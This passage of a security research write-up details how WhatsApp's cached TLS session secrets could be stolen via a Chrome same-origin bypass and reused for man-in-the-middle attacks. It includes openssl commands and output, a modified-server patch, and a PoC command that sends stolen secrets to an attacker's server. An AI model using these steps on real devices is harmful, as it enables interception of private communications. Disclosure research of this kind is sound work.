_data=/storage/emulated/0/test.html To execute the proof-of-concept code, open content://media/external/file/617 in Chrome. You should see something like the following: One may ask, "but how is WhatsApp related to this Chrome vulnerability?". If an attacker sends a malicious HTML file to a victim user over WhatsApp, then when this file is viewed it will actually be rendered using Chrome. Chrome will use a content provider internal to WhatsApp to access the malicious Javascript content. However, due to the CVE-2020-6516 Chrome bug the malicious code will be able to access any other resource from any other content provider on the system. The astute reader might remember that we had found that WhatsApp placed the SSLSessionCache and watls-sessions directories under unprotected external storage. These directories contain TLS session cryptographic material. This material could have been collected in the way we just explained, by a remote attacker through a phishing attack. In the sections that follow we will explain how session resumption works for TLS 1.3 and TLS 1.2, but also how the collected cryptographic material could be used to conduct man-in-the-middle attacks to victim users. Session Resumption and Pre-Shared Keys in TLS 1.3 TLS connections go through a process referred to as the TLS handshake. During this process, communicating peers will authenticate each other, negotiate cryptographic parameters and determine various aspects of the connection via a set of agreed-upon extensions. Server identity authentication uses asymmetric cryptography (for X509 certificate validation etc.), which is a computationally intensive process, especially for smaller form-factor embedded devices (e.g. mobile phones). For TLS 1.3, the handshake protocol is analyzed in section 4 of RFC 8446 [17]. To reduce power-consumption and save CPU cycles when multiple or simultaneous TLS connections are established in a short period of time, session resumption was proposed. In TLS 1.3 session resumption in based on Pre-Shared Keys (PSKs). PSKs are typically established in-band after a successful certificate-based authentication (but it is possible to also establish these out-of-band through, for example, secrets on a piece of paper). During session resumption, knowledge of the PSK will act as the sole authentication mechanism between the client and the server. No other (certificate-based etc.) authentication will be required by the communicating peers. Avoiding the asymmetric cryptography of certificate-based authentication in session resumption makes it faster and greener in terms of power consumption. The above leads to an interesting conclusion: If a remote attacker could collect the PSK from the client device, then it would be possible to perform a man-in-the-middle attack to this client when in TLS session resumption, as no certificate validation would be performed against the fraudulent server endpoint. In Android, certificate validation is performed by the framework, but application developers are allowed to override this process for the purpose of implementing their own custom certificate handling/pinning mechanism. Certificate pinning enables apps to only proceed to a connection if the presented certificate has certain characteristics (e.g. has a certain public key, is signed by a certain intermediate certificate etc.). The class responsible for handling server-presented certificates is X509TrustManager and developers are free to inherit and override its checkServerTrusted() method. However, as no certificate validation is performed in TLS session resumption, the X509TrustManager is never consulted, and thus no standard or custom certificate validation (e.g. pinning checks) will take place. This becomes the perfect opportunity for a man-in-the-middle attack. Page 8 of RFC8446 for TLS 1.3, notes that: Session resumption with and without server-side state as well as the PSK-based cipher suites of earlier TLS versions have been replaced by a single new PSK exchange. This means that all PSK related actions have been homogenized (both PSK-cipher suites and PSK for session resumption) in TLS 1.3. This makes it easy for us to create the man-in-the-middle endpoint for session resumption through standard tools such as the openssl s_server implementation. The attacker controlled s_server instance does not need to do a lookup for the right PSK to use in the incoming connection, as this can be fixed to the collected one (through the -psk parameter). Furthermore, TLS 1.3 uses a PSK binder value, to have the client prove to the server that it is indeed the true owner of a previously established PSK. The attacker controlled endpoint is free to ignore this value, and will proceed to establishing the connection as implemented in our patch for openssl, found in the PoC repository [37] under openssl-1.1.1f-patches/watls-mitm.patch. To demonstrate the above lets use the OpenSSL client to connect to one of WhatsApp's servers that uses TLS v1.3. Session information can be stored, for resumption at a later time, using the -sess_out command line switch, as shown below: $ openssl s_client -host media-sof1-1.cdn.whatsapp.net -port 443 -sess_out /tmp/session.pem Let's have a look at the corresponding PSK: $ openssl sess_id -in /tmp/session.pem -text | grep PSK Resumption PSK: C4B33F312F10EBB2B7EE125EB8C686DF83E85D740F49B5CE6EB09499065B3353 PSK identity: None PSK identity hint: None Next, follow the instructions in our PoC's watls_psk_extract/README.md to prepare a modified OpenSSL variant, capable of performing TLS v1.3 MitM, and execute run_server.sh, passing it the extracted PSK, as shown below: $ cd watls_psk_extract $ ./run_server.sh C4B33F312F10EBB2B7EE125EB8C686DF83E85D740F49B5CE6EB09499065B3353 Using PSK C4B33F312F10EBB2B7EE125EB8C686DF83E85D740F49B5CE6EB09499065B3353 Running WaTLS version ACCEPT If our theory is correct, one can now use /tmp/session.pem to connect to localhost and resume the session that was initially established with media-sof1-1.cdn.whatsapp.net. Indeed, using OpenSSL's s_client and the -sess_in command line switch, we can do the following: $ openssl s_client -sess_in /tmp/session.pem -host localhost -port 443 CONNECTED(00000006) Can't use SSL_get_servername --- Server certificate -----BEGIN CERTIFICATE----- MIIF1zCCBL+gAwIBAgIQDOmsxODES4Klhbv8cv6EizANBgkqhkiG9w0BAQsFADBw MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3 d3cuZGlnaWNlcnQuY29tMS8wLQYDVQQDEyZEaWdpQ2VydCBTSEEyIEhpZ2ggQXNz dXJhbmNlIFNlcnZlciBDQTAeFw0yMTAyMTAwMDAwMDBaFw0yMTA1MTAyMzU5NTla MGkxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpDYWxpZm9ybmlhMRMwEQYDVQQHEwpN ZW5sbyBQYXJrMRcwFQYDVQQKEw5GYWNlYm9vaywgSW5jLjEXMBUGA1UEAwwOKi53 aGF0c2FwcC5uZXQwWTATBgcqhkjOPQIBBggqhkjOPQMBBwNCAARnhHhwhX0sqHwl bcIQUCcf6974FldeoPmrHOOEDPGSxeRVRxOXRaGjfX72Xlakyz5WpJx8uSlghjjz qvaTeBNwo4IDPTCCAzkwHwYDVR0jBBgwFoAUUWj/kK8CB3U8zNllZGKiErhZcjsw HQYDVR0OBBYEFDGwR2i4anDM4OmK42mRNINbzAxdMHQGA1UdEQRtMGuCEiouY2Ru LndoYXRzYXBwLm5ldIISKi5zbnIud2hhdHNhcHAubmV0gg4qLndoYXRzYXBwLmNv bYIOKi53aGF0c2FwcC5uZXSCBXdhLm1lggx3aGF0c2FwcC5jb22CDHdoYXRzYXBw Lm5ldDAOBgNVHQ8BAf8EBAMCB4AwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUF BwMCMHUGA1UdHwRuMGwwNKAyoDCGLmh0dHA6Ly9jcmwzLmRpZ2ljZXJ0LmNvbS9z aGEyLWhhLXNlcnZlci1nNi5jcmwwNKAyoDCGLmh0dHA6Ly9jcmw0LmRpZ2ljZXJ0 LmNvbS9zaGEyLWhhLXNlcnZlci1nNi5jcmwwPgYDVR0gBDcwNTAzBgZngQwBAgIw KTAnBggrBgEFBQcCARYbaHR0cDovL3d3dy5kaWdpY2VydC5jb20vQ1BTMIGDBggr BgEFBQcBAQR3MHUwJAYIKwYBBQUHMAGGGGh0dHA6Ly9vY3NwLmRpZ2ljZXJ0LmNv bTBNBggrBgEFBQcwAoZBaHR0cDovL2NhY2VydHMuZGlnaWNlcnQuY29tL0RpZ2lD ZXJ0U0hBMkhpZ2hBc3N1cmFuY2VTZXJ2ZXJDQS5jcnQwDAYDVR0TAQH/BAIwADCC AQUGCisGAQQB1nkCBAIEgfYEgfMA8QB2AH0+8viP/4hVaCTCwMqeUol5K8UOeAl/ LmqXaJl+IvDXAAABd4q64v0AAAQDAEcwRQIgKZOZs5XzLPIAR1XcJzkjS721qtTO 7HnHtN9lQ6gmLjUCIQCiJCYvSURNjEWk+OKy9DJQ8J19BeZTXPqQtEq3HrcTLwB3 AFzcQ5L+5qtFRLFemtRW5hA3+9X6R9yhc5SyXub2xw7KAAABd4q64skAAAQDAEgw RgIhAKzh5Q+vXt+C9HS7r+H1ZjJIQeK11tLGnBNGVFAExeSLAiEAsAW8HhwfFSBE sHaeIUyKt1xq03qjfjLmy6FQnE3lDj8wDQYJKoZIhvcNAQELBQADggEBAF+XRlKE eval5PuqA1hKHJRtvP5uQUneXLAS+ch1pjhfveKjUuiWm+04y+liSlVRoGNm/6Og GEg9CrCMu2SlFsD6UMsK6BMmb3HWcFH5P9HY1so1cIsXcpSxwJEDbZD8ATDA1rH3 komGIYbzgMbcfMi/mjyXTvxrdaBp5QnT32PzOxMyYuWn2gg3n7wxBKppyGuuqarP tIXuIsBkLe+6k1S0+gvuRS4l28V/BD985eQZJg8/KE6061v/aLNBlP3anIksH9AJ 9j1zerIq9cL7NEcvz1PEu97D1SpBH75znPAHArtjXa/0U7SRwQxahx8a82pl/+Zb rGufx1+jMcviB6M= -----END CERTIFICATE----- subject=C = US, ST = California, L = Menlo Park, O = "Facebook, Inc.", CN = *.whatsapp.net issuer=C = US, O = DigiCert Inc, OU = www.digicert.com, CN = DigiCert SHA2 High Assurance Server CA --- No client certificate CA names sent Server Temp Key: X25519, 253 bits --- SSL handshake has read 225 bytes and written 534 bytes Verification: OK --- Reused, TLSv1.3, Cipher is TLS_AES_128_GCM_SHA256 Server public key is 256 bit Secure Renegotiation IS NOT supported Compression: NONE Expansion: NONE No ALPN negotiated Early data was not sent Verify return code: 0 (ok) --- --- Post-Handshake New Session Ticket arrived: SSL-Session: Protocol : TLSv1.3 Cipher : TLS_AES_128_GCM_SHA256 Session-ID: D600D456331645CDF46A5426F3CE7801CE228B98195D7E511D8A5F4F783F225F Session-ID-ctx: Resumption PSK: ACEE401AC866A076351CD495517260327104CF08BD1CBFB75299ADB658991B2C PSK identity: None PSK identity hint: None SRP username: None TLS session ticket lifetime hint: 304 (seconds) TLS session ticket: 0000 - ff 64 91 18 ea 0a 17 1c-2f 10 20 52 ef 08 7a 8a .d....../. R..z. 0010 - 94 91 f4 ff 47 f0 28 d4-78 e5 65 a0 6d f0 c0 fe ....G.(.x.e.m... Start Time: 1615551534 Timeout : 7200 (sec) Verify return code: 0 (ok) Extended master secret: no Max Early Data: 0 --- read R BLOCK read:errno=0 There are a few things worth noting in the above output. First and foremost, the certificate displayed does not come from the TLS handshake, but was deserialized directly from /tmp/session.pem, as the latter was used for session resumption purposes. Next, looking carefully, one can see a message reading Verification: OK, despite the fact our MitM server uses a self-signed certificate. Furthermore, a few lines below, we are informed that the session was reused (Reused, TLSv1.3, Cipher is TLS_AES_128_GCM_SHA256) and that verification was indeed successful (Verify return code: 0 (ok)). From the client's perspective, everything seems normal and the connection is resumed. The modified s_server accepts the connection, but receives a PSK binder which is HMAC'ed by an unknown key pair. However, the binder is ignored, and since the exact PSK value was specified at the command line, connection establishment can proceed as usual. When that happens, the following output is printed at the server's console: $ ./run_server.sh C4B33F312F10EBB2B7EE125EB8C686DF83E85D740F49B5CE6EB09499065B3353 ... PSK warning: client identity not what we expected (got '...' expected 'Client_identity') Ignoring PSK binders! Another thing to note here is that, clearly, the PSK identity is not important for the server. It is just a lookup key in a cache, a hash table of PSKs for example, and does not constitute a cryptographic proof of any kind. The server accepts the connection despite the fact that a different PSK identity was expected. Session Resumption and the Master Secret in TLS 1.2 In TLS 1.2 session resumption is based solely on Master Secret knowledge; if the two communicating parties have saved their previous state in a secure location, they can continue communicating by re-deriving new session keys based on the previously agreed upon shared secret. As with TLS 1.3, session resumption does not go through any other form of authentication (e.g. certificate validation). The handshake protocol of TLS 1.2 is analyzed in section 7 of RFC 5246 [21], while session resumption in section F.1.4: "When a connection is established by resuming a session, new ClientHello.random and ServerHello.random values are hashed with the session's master_secret. Provided that the master_secret has not been compromised and that the secure hash operations used to produce the encryption keys and MAC keys are secure, the connection should be secure and effectively independent from previous connections. Attackers cannot use known encryption keys or MAC secrets to compromise the master_secret without breaking the secure hash operations." "The client sends a ClientHello using the Session ID of the session to be resumed. The server then checks its session cache for a match. If a match is found, and the server is willing to re-establish the connection under the specified session state, it will send a ServerHello with the same Session ID value." Again, the session ID serves no cryptographic purpose other than probably playing the role of an index in the server's session cache. Moreover, it should be noted that the use of extended master secrets [22] does not protect from stolen master keys. To see how this works in practice, one can do the following. First, connect to one of WhatsApp's servers using TLS v1.2 and store the session on disk using -sess_out as shown below: $ openssl s_client -tls1_2 -host crashlogs.whatsapp.net -port 443 -sess_out /tmp/session.pem Carefully examine the output of the above command. There should be no verification errors or anything alike, as WhatsApp's infrastructure uses certificates issued by DigiCert. The session identifier and the master secret of the saved session can be examined using the following command: $ openssl sess_id -in /tmp/session.pem -text | egrep '(Master|Session)' SSL-Session: Session-ID: 6B0B3946BC2CB7A1C661C0E06824A778FB71130228758D9CA131646A6AF1EE0A Session-ID-ctx: Master-Key: 9458D6E22954C615B42B24B9FBF19D31B694F9A66F4ACBC1EF93B082A7BDB862C11270DA6A283EAD3E1F2D848300A137 Now, enter directory tls12_psk_extract in the PoC repository [37], copy /tmp/session.pem and convert it to DER format: $ pwd [..]/whatsapp-mitd-mitm/tls12_psk_extract $ cp /tmp/session.pem . $ openssl sess_id -inform PEM -in session.pem -outform DER -out session.der Unfortunately, unlike s_client, OpenSSL's s_server does not allow specifying a master secret or a session ID at the command line for the purpose of accepting resumed TLS 1.2 sessions (i.e. there's no -psk equivalent for TLS 1.2). For this purpose, we modified OpenSSL's ssl/ssl_sess.c to have s_server load a TLS session from an external DER file. Consider it similar to -sess_in of s_client. + /* CENSUS: Load the BoringSSL session converted to OpenSSL format. */ + if(ret == NULL) { + int fd; + char buf[4096], *bufp = &buf[0]; + size_t size; + SSL_SESSION *session; + + printf("[CENSUS] Loading BoringSSL session from %s\n", SESSION_FILE); + + if((fd = open(SESSION_FILE, O_RDONLY)) >= 0) { + + size = read(fd, buf, sizeof(buf)); + printf("[CENSUS] Loaded %zu bytes\n", size); + + if((session = d2i_SSL_SESSION(NULL, (const unsigned char **)&bufp, size)) != NULL) { + printf("[CENSUS] Session was successfully loaded at %p\n", (void *)session); + ret = session; + } + + close(fd); + } + } With this modification, a client can save TLS session information in a DER file, using -sess_out, and then have an s_server instance load that file during TLS 1.2 handshake. The effect is similar to the -psk example demonstrated previously; the client with prior knowledge of the session ID and the master secret will successfully establish the TLS connection. The corresponding OpenSSL modifications can be found, in our PoC repository [37], at openssl-1.1.1f-patches/tls12-mitm.patch. Follow the instructions in tls12_psk_extract/README.md to prepare an OpenSSL 1.1.1f variant capable of performing TLS 1.2 MitM. When ready, just run the MitM server: $ ./run_server.sh ... Running TLS v1.2 version Using default temp DH parameters ACCEPT Using s_client attempt to resume the session initially established with crashlogs.whatsapp.net, but this time connect to localhost instead. To do this, use the -sess_in command line switch, as shown below: $ openssl s_client -tls1_2 -host localhost -port 443 -sess_in /tmp/session.pem CONNECTED(00000006) --- Server certificate -----BEGIN CERTIFICATE----- MIIF1zCCBL+gAwIBAgIQDOmsxODES4Klhbv8cv6EizANBgkqhkiG9w0BAQsFADBw MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3 d3cuZGlnaWNlcnQuY29tMS8wLQYDVQQDEyZEaWdpQ2VydCBTSEEyIEhpZ2ggQXNz dXJhbmNlIFNlcnZlciBDQTAeFw0yMTAyMTAwMDAwMDBaFw0yMTA1MTAyMzU5NTla MGkxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpDYWxpZm9ybmlhMRMwEQYDVQQHEwpN ZW5sbyBQYXJrMRcwFQYDVQQKEw5GYWNlYm9vaywgSW5jLjEXMBUGA1UEAwwOKi53 aGF0c2FwcC5uZXQwWTATBgcqhkjOPQIBBggqhkjOPQMBBwNCAARnhHhwhX0sqHwl bcIQUCcf6974FldeoPmrHOOEDPGSxeRVRxOXRaGjfX72Xlakyz5WpJx8uSlghjjz qvaTeBNwo4IDPTCCAzkwHwYDVR0jBBgwFoAUUWj/kK8CB3U8zNllZGKiErhZcjsw HQYDVR0OBBYEFDGwR2i4anDM4OmK42mRNINbzAxdMHQGA1UdEQRtMGuCEiouY2Ru LndoYXRzYXBwLm5ldIISKi5zbnIud2hhdHNhcHAubmV0gg4qLndoYXRzYXBwLmNv bYIOKi53aGF0c2FwcC5uZXSCBXdhLm1lggx3aGF0c2FwcC5jb22CDHdoYXRzYXBw Lm5ldDAOBgNVHQ8BAf8EBAMCB4AwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUF BwMCMHUGA1UdHwRuMGwwNKAyoDCGLmh0dHA6Ly9jcmwzLmRpZ2ljZXJ0LmNvbS9z aGEyLWhhLXNlcnZlci1nNi5jcmwwNKAyoDCGLmh0dHA6Ly9jcmw0LmRpZ2ljZXJ0 LmNvbS9zaGEyLWhhLXNlcnZlci1nNi5jcmwwPgYDVR0gBDcwNTAzBgZngQwBAgIw KTAnBggrBgEFBQcCARYbaHR0cDovL3d3dy5kaWdpY2VydC5jb20vQ1BTMIGDBggr BgEFBQcBAQR3MHUwJAYIKwYBBQUHMAGGGGh0dHA6Ly9vY3NwLmRpZ2ljZXJ0LmNv bTBNBggrBgEFBQcwAoZBaHR0cDovL2NhY2VydHMuZGlnaWNlcnQuY29tL0RpZ2lD ZXJ0U0hBMkhpZ2hBc3N1cmFuY2VTZXJ2ZXJDQS5jcnQwDAYDVR0TAQH/BAIwADCC AQUGCisGAQQB1nkCBAIEgfYEgfMA8QB2AH0+8viP/4hVaCTCwMqeUol5K8UOeAl/ LmqXaJl+IvDXAAABd4q64v0AAAQDAEcwRQIgKZOZs5XzLPIAR1XcJzkjS721qtTO 7HnHtN9lQ6gmLjUCIQCiJCYvSURNjEWk+OKy9DJQ8J19BeZTXPqQtEq3HrcTLwB3 AFzcQ5L+5qtFRLFemtRW5hA3+9X6R9yhc5SyXub2xw7KAAABd4q64skAAAQDAEgw RgIhAKzh5Q+vXt+C9HS7r+H1ZjJIQeK11tLGnBNGVFAExeSLAiEAsAW8HhwfFSBE sHaeIUyKt1xq03qjfjLmy6FQnE3lDj8wDQYJKoZIhvcNAQELBQADggEBAF+XRlKE eval5PuqA1hKHJRtvP5uQUneXLAS+ch1pjhfveKjUuiWm+04y+liSlVRoGNm/6Og GEg9CrCMu2SlFsD6UMsK6BMmb3HWcFH5P9HY1so1cIsXcpSxwJEDbZD8ATDA1rH3 komGIYbzgMbcfMi/mjyXTvxrdaBp5QnT32PzOxMyYuWn2gg3n7wxBKppyGuuqarP tIXuIsBkLe+6k1S0+gvuRS4l28V/BD985eQZJg8/KE6061v/aLNBlP3anIksH9AJ 9j1zerIq9cL7NEcvz1PEu97D1SpBH75znPAHArtjXa/0U7SRwQxahx8a82pl/+Zb rGufx1+jMcviB6M= -----END CERTIFICATE----- subject=C = US, ST = California, L = Menlo Park, O = "Facebook, Inc.", CN = *.whatsapp.net issuer=C = US, O = DigiCert Inc, OU = www.digicert.com, CN = DigiCert SHA2 High Assurance Server CA --- No client certificate CA names sent --- SSL handshake has read 141 bytes and written 485 bytes Verification error: unable to get local issuer certificate --- Reused, TLSv1.2, Cipher is ECDHE-ECDSA-AES128-GCM-SHA256 Server public key is 256 bit Secure Renegotiation IS supported Compression: NONE Expansion: NONE No ALPN negotiated SSL-Session: Protocol : TLSv1.2 Cipher : ECDHE-ECDSA-AES128-GCM-SHA256 Session-ID: 6B0B3946BC2CB7A1C661C0E06824A778FB71130228758D9CA131646A6AF1EE0A Session-ID-ctx: Master-Key: 9458D6E22954C615B42B24B9FBF19D31B694F9A66F4ACBC1EF93B082A7BDB862C11270DA6A283EAD3E1F2D848300A137 PSK identity: None PSK identity hint: None SRP username: None TLS session ticket lifetime hint: 172800 (seconds) TLS session ticket: 0000 - 8b 5b f6 5b c6 05 a2 36-48 88 79 8e 5d e6 55 f8 .[.[...6H.y.].U. 0010 - e2 75 43 33 a5 84 b4 8e-60 38 ee e8 bb a8 69 ad .uC3....`8....i. 0020 - 56 cb 6e a4 9a f4 93 fd-0a 67 51 f4 68 0d 59 40 V.n......gQ.h.Y@ 0030 - 49 80 97 7b ce 9f 6b fb-73 27 65 df 0e c3 8f b6 I..{..k.s'e..... 0040 - f7 9a 9c 31 2f b3 e3 8b-32 9c d3 0d 46 30 84 d3 ...1/...2...F0.. 0050 - 89 5c 82 a7 28 9a 41 18-53 9e fa 58 b1 80 78 62 .\..(.A.S..X..xb 0060 - b3 f6 bc ce bd e5 5b 40-f1 14 16 b4 66 b4 80 48 ......[@....f..H 0070 - 1c ba d2 ed 23 9f cd 80-b2 56 a1 e8 0f 6b 6d e2 ....#....V...km. 0080 - 03 40 ba 92 3a f4 a6 b9-ef 35 8e 87 68 6e 54 1a .@..:....5..hnT. 0090 - 05 ac eb 5c 2b c4 52 3d-ca f8 6d 91 22 ce 21 d5 ...\+.R=..m.".!. 00a0 - d4 56 32 35 23 a2 6c 20-31 0e 71 b6 04 24 ac 64 .V25#.l 1.q..$.d 00b0 - 8f bb 77 d7 97 04 bc 73-71 ff 86 0c e3 a7 45 2e ..w....sq.....E. 00c0 - 16 dc ac b9 61 9f 60 d9-c3 cb 2d 73 87 33 53 32 ....a.`...-s.3S2 Start Time: 1616078131 Timeout : 7200 (sec) Verify return code: 20 (unable to get local issuer certificate) Extended master secret: yes --- Notice that, at the client side, no verification takes place and no error is shown. Since the session identifier and the master secret are both known, the encrypted session is resumed normally. Indeed, taking a closer look at the output above, reveals that the session identifier and the master secret have been successfully reused, as they match those of /tmp/session.pem: SSL-Session: Protocol : TLSv1.2 Cipher : ECDHE-ECDSA-AES128-GCM-SHA256 Session-ID: 6B0B3946BC2CB7A1C661C0E06824A778FB71130228758D9CA131646A6AF1EE0A Session-ID-ctx: Master-Key: 9458D6E22954C615B42B24B9FBF19D31B694F9A66F4ACBC1EF93B082A7BDB862C11270DA6A283EAD3E1F2D848300A137 At the server side, our modified OpenSSL server loads session.der (produced from /tmp/session.pem), loads the session identifier and the master secret from there, and resumes the session as if nothing is wrong. The following output is displayed: $ ./run_server.sh ... [CENSUS] Looking up session 6b0b3946bc2cb7a1... [CENSUS] SSL_SESS_CACHE_NO_INTERNAL_LOOKUP not set! [CENSUS] Loading BoringSSL session from session.der [CENSUS] Loaded 1877 bytes [CENSUS] Session was successfully loaded at 0x7fc168d21e90 [CENSUS] Session cache miss, no problem! The session identifier was not found in the server's cache. This is no problem for our MitM server, as a stolen session (session.der) is explicitly loaded and reused, as if it was found in the cache in the first place. At this point the client believes it is communicating securely, however its communications are subject to eavesdropping and modification by the man-in-the-middle server! The WhatsApp TLS Man-in-the-Disk Vulnerabilities Privacy is one of WhatsApp's major features. It is achieved by using end-to-end encryption [23] in messages exchanged between clients, as well as through the use of TLS 1.3 / TLS 1.2 for client to server communications (the actual protocol used depends on the endpoint) [24]. To take advantage of the benefits offered by TLS session resumption, WhatsApp implements its own TLS-PSK session management code for TLS 1.3 and uses FileClientSessionCache [25] for TLS 1.2. The logic is pretty simple; when a TLS connection is initiated, WhatsApp looks for a previously stored session on the device's filesystem. If one is found, a PSK or master secret is loaded from there and the session is resumed. Otherwise, a full TLS handshake takes place, after which PSK/master secrets might be established and stored for future use. The above TLS session management code introduced two identical man-in-the-disk ulnerabilities, one affecting TLS 1.2 connections and one affecting TLS 1.3 connections. The problem is that WhatsApp stores the aforementioned TLS session information in the directory returned by Context.getExternalCacheDir(). This directory lies under the external storage of /sdcard. Any Android app holding the READ_EXTERNAL_STORAGE or WRITE_EXTERNAL_STORAGE permission could gain read / write access to these files through the filesystem, on Android 10 and previous versions of Android. Alternatively, these files were indexed and made available to other apps through the Media Store content provider on Android 9 and previous versions of Android. WaTLS (WhatsApp TLS) is WhatsApp's custom Java implementation of TLS 1.3. WaTLS is a full TLS stack, developed from scratch, that comes with its own TLS state machine, packet parsing logic and so on. When connected to the WhatsApp network, a WhatsApp client receives configuration information from the upstream servers. Among others, the aforementioned configuration controls whether the client should use WaTLS or fall back to the external SSL cache. WaTLS is mostly used for media downloads, including end-to-end (E2E) encrypted media exchanged by users. Other than that, it is used behind the scenes when newly updated WhatsApp installations upload crash statistics to WhatsApp cloud servers (e.g. memory dumps). Additionally, it seems to have limited usage in VoIP scenarios, but the author has not investigated this further. As shown below, the WatlsCache class controlling access to TLS session information cached on disk, stores all data under the directory returned by application.getExternalCacheDir(). The getWatlsFileName() method is called to retrieve the filename that stores the TLS session information corresponding to the session identifier argument. public class WatlsCache implements WatlsCacheInterface { public static final WatlsCache instance = new WatlsCache(); public String watlsDirName; static { ... if(application != null && application.getExternalCacheDir() != null) { String A0C = AnonymousClass0CC.concatStrings(r1.application.getExternalCacheDir().getAbsolutePath(), "/", "watls-sessions"); File file = new File(A0C); ... instance.watlsDirName = A0C; } } ... public final String getWatlsFileName(byte[] bArr) { return this.watlsDirName + "/" + Base64.encodeToString(bArr, 10); } } Cached items bear filenames that encode (serialize) information about the TLS session endpoint. See for example the following filename which bears base64 encoded information about the hostname, port and cipher suite of a WhatsApp endpoint. $ echo 'bWVkaWEuZmF0aDQtMi5mbmEud2hhdHNhcHAubmV0IzQ0MyNUTFNfQUVTXzEyOF9HQ01fU0hBMjU2' | base64 -D media.fath4-2.fna.whatsapp.net#443#TLS_AES_128_GCM_SHA256 For TLS 1.2 connections, WhatsApp relies on facilities offered by Java and consequently by the Android framework. The TLS 1.2 mechanism is used for profile picture and sticker pack downloads, sonar pingback (related to location sharing), WhatsApp payments, but also for account registration and verification procedures. Last but not least, devices running WhatsApp, that come with no Google Play Store services (com.android.vending) pre-installed, communicate with https://www.whatsapp.com over TLS 1.2 to determine the latest version of the APK and, if needed, download the app and install it. In TLS 1.2, file-based storage of TLS sessions is achieved via SSLSessionCache [28], whose constructor takes a File instance, pointing to the directory where sessions will be stored. An SSLSocketFactory descendant is used to actually create SSL sockets utilizing the external SSL session cache. The entry point to this logic is ExternalSSLCacheEnabledSSLSocketFactoryInterface (X.1Sb), shown below. public abstract class ExternalSSLCacheEnabledSSLSocketFactoryInterface extends SSLSocketFactory { ... public final SSLSessionCache externalSSLSessionCache; ... static { File externalCacheDir = context.getExternalCacheDir(); SSLSessionCache sslSessionCache = new SSLSessionCache(new File(externalCacheDir, "SSLSessionCache")); this.externalSSLSessionCache = sslSessionCache; } } Again, we see that context.getExternalCacheDir() is consulted to identify the path where cached TLS session items will be stored. An adversary that has somehow gained access to the external cache directory (e.g. through a rogue or vulnerable application) can steal TLS 1.3 PSK keys and TLS 1.2 Master Secrets. As already discussed, this could lead to successful man-in-the-middle attacks. For the purposes of this article we will use the previously described SOP bypass vulnerability in Chrome, to remotely access the TLS session secrets. All an attacker has to do is lure the victim into opening an HTML document attachment. WhatsApp will render this attachment in Chrome, over a content provider, and the attacker's Javascript code will be able to steal the stored TLS session keys. Convincing a user to actually open an HTML document is an art by itself. However, as it will become clear later, the protobuf-based WhatsApp messaging protocol could aid the attacker in this respect. From TLS secrets collection to Remote Code Execution This section explores two attacks against WhatsApp, one leading to code execution and one leading to leakage of Noise protocol keys, used in end-to-end encryption of user communications. The former requires the TLS 1.2 man-in-the-middle capability, while the latter requires a combination of TLS 1.2 and TLS 1.3 man-in-the-middle capabilities. As the TLS 1.3 man-in-the-disk vulnerability was patched at the time we were creating the demo for the issue, we emulated the TLS 1.3 man-in-the-middle capability through Frida in the second attack (forcing connections over TLS 1.2). If you have access to a version of the app where both TLS man-in-the-disk vulnerabilities exist, then it is possible to carry out the second attack without emulation, by setting up two OpenSSL instances; one for TLS 1.2 MitM and one for TLS 1.3 (WaTLS) MitM. Both attacks start with an information gathering phase where the remote attacker will collect the TLS session secrets. In the video above, on the left, running on the dark theme, we can see the attacker device, and on the right, running on the light theme, the victim device. The attacker begins information gathering by executing main.py of the proof-of-concept toolset, which makes use of Python and Frida to control the attacking device. This is how the command looks like: python main.py -s ANDROID_SERIAL -a 192.168.1.100 -p 8000 images/the_guardian.jpg \ MOBILE_NUMBER@s.whatsapp.net "Rush for Mediterranean gas" -r Argument -s ANDROID_SERIAL instructs ADB to connect to the attacker's device with the specified device serial number. Arguments -a and -p determine the IP address and port of the web server, where the SOP exploit will POST the extracted secrets to using AJAX, while -r instructs our PoC to run a simple HTTP server on the local PC. Alternatively one could have specified the IP of a remote web server the attacker controls. The three non-positional arguments are (1) the path to an image to show as a fake message preview at the victim's side, (2) the victim's mobile number and, (3) a string to show as a caption below the fake preview. The PoC uses Frida hooks on a WhatsApp method responsible for sending document messages. It attaches the fake message preview and caption in the outgoing protocol buffer to make the result more attractive for the victim to click on. In this demonstration, the remote attacker sends to the victim what it looks like a link to an interesting article on a newspaper. Upon clicking on the message, the victim is presented with the standard Android application picker. The message's mime type, as sent in the WhatsApp protocol buffer headers, is set to 'text/html', so Chrome is usually the only entry in the aforementioned picker. When the victim clicks on the message, the SOP exploit executes. For debugging purposes we have designed an HTML page that displays progress information during exploitation, but a real life scenario might have an actual newspaper article being displayed on the victim's screen. The exploit, in just a few seconds, brute-forces the first 1000 IDs in the Media Store and locates files that look like serialized TLS sessions. Using AJAX, these files are sent back to a server of the attacker's choosing. In this demonstration, the web-server has been started on the attacker's PC and the received TLS secrets are stored under /tmp in files with the .bin extension. With the TLS material now in the attacker's possession, the victim is now exposed to man-in-the-middle attacks. To gain a man-in-the-middle position in the network, the attacker may use several methods (e.g. ARP spoofing, DNS spoofing, router / BGP hijacking, tapping of communication links etc.) depending on the resources available. Nation state actors have demonstrated in the past increased capabilities in this area of attacks. It might be the case that there are several opportunities for code execution once a MitM channel has been established, but for demonstration purposes, this section focuses on a simple file overwrite capability made available through TLS-transported ZIP files. The WhatsApp client uses photo filters and doodle emojis, which are downloaded from the upstream network. Both of these resources are referred to as downloadables in the WhatsApp Java code. Use of downloadables depends on WhatsApp network configuration parameters. Where the author lives, filters seem to be enabled, while emojis are disabled, so this attack will focus on the former. Additionally, photo filters are downloaded the first time a user attempts to use them, and are not downloaded again for the rest of the WhatsApp installation lifetime, while doodle emojis are refreshed every now and then. Consequently, the attacker has a single chance of exploiting filters, while more cases are available for performing MitM on the emoji downloader. Interested readers can check the related network settings on their devices: # pwd /data/data/com.whatsapp/shared_prefs # grep -r downloadable_doodle . If no result is shown, downloadable doodle emojis are disabled on your device. When the user attempts to use photo filters, WhatsApp performs an HTTP request in the background to the following URL: https://static.whatsapp.net/downloadable?category=filter A ZIP bundle is downloaded from the above location and extracted using the following piece of code, which can be found in class FilterManager (X.2FB). Similar code can be found in the DoodleEmojiManager class (X.1zX) for Emojis. public boolean 